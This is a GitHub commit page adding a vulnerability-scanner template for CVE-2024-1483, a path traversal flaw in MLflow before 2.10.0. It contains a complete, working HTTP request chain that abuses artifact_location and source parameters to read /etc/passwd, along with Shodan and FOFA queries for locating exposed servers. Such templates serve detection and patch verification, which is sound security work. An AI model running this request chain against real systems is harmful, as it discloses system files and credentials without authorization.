-
Notifications
You must be signed in to change notification settings - Fork 2.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #11275 from gy741/rule-add-v167
Create CVE-2024-1483.yaml
- Loading branch information
Showing
1 changed file
with
103 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,103 @@ | ||
| id: CVE-2024-1483 | ||
|
|
||
| info: | ||
| name: Mlflow < 2.9.2 - Path Traversal | ||
| author: gy741 | ||
| severity: high | ||
| description: | | ||
| A path traversal vulnerability exists in mlflow/mlflow version 2.9.2, allowing attackers to access arbitrary files on the server. By crafting a series of HTTP POST requests with specially crafted 'artifact_location' and 'source' parameters, using a local URI with '#' instead of '?', an attacker can traverse the server's directory structure. The issue occurs due to insufficient validation of user-supplied input in the server's handlers. | ||
| impact: | | ||
| Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations. | ||
| remediation: | | ||
| To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0. | ||
| reference: | ||
| - https://huntr.com/bounties/52a3855d-93ff-4460-ac24-9c7e4334198d | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2024-1483 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
| cvss-score: 7.5 | ||
| cve-id: CVE-2024-1483 | ||
| cwe-id: CWE-29 | ||
| epss-score: 0.00044 | ||
| epss-percentile: 0.11996 | ||
| cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* | ||
| metadata: | ||
| verified: true | ||
| max-request: 5 | ||
| vendor: lfprojects | ||
| product: mlflow | ||
| shodan-query: "http.title:\"mlflow\"" | ||
| fofa-query: | ||
| - title="mlflow" | ||
| - app="mlflow" | ||
| google-query: intitle:"mlflow" | ||
| tags: cve,cve2024,mlflow,lfi,intrusive,lfprojects | ||
|
|
||
| http: | ||
| - raw: | ||
| - | | ||
| POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Content-Type: application/json | ||
| {"name": "{{randstr}}", "artifact_location": "http:///#/../../../../../../../../../../../../../../etc/"} | ||
| - | | ||
| POST /api/2.0/mlflow/runs/create HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Content-Type: application/json | ||
| {"experiment_id": "{{EXPERIMENT_ID}}"} | ||
| - | | ||
| POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Content-Type: application/json | ||
| {"name": "{{randstr}}"} | ||
| - | | ||
| POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Content-Type: application/json | ||
| {"name": "{{randstr}}", "run_id": "{{RUN_ID}}", "source": "file:///etc/"} | ||
| - | | ||
| GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: regex | ||
| part: body_5 | ||
| regex: | ||
| - "root:.*:0:0:" | ||
|
|
||
| - type: word | ||
| part: header_5 | ||
| words: | ||
| - "filename=passwd" | ||
| - "application/octet-stream" | ||
| condition: and | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 | ||
|
|
||
| extractors: | ||
| - type: json | ||
| part: body_1 | ||
| name: EXPERIMENT_ID | ||
| group: 1 | ||
| json: | ||
| - '.experiment_id' | ||
| internal: true | ||
|
|
||
| - type: json | ||
| part: body_2 | ||
| name: RUN_ID | ||
| group: 1 | ||
| json: | ||
| - '.run.info.run_id' | ||
| internal: true |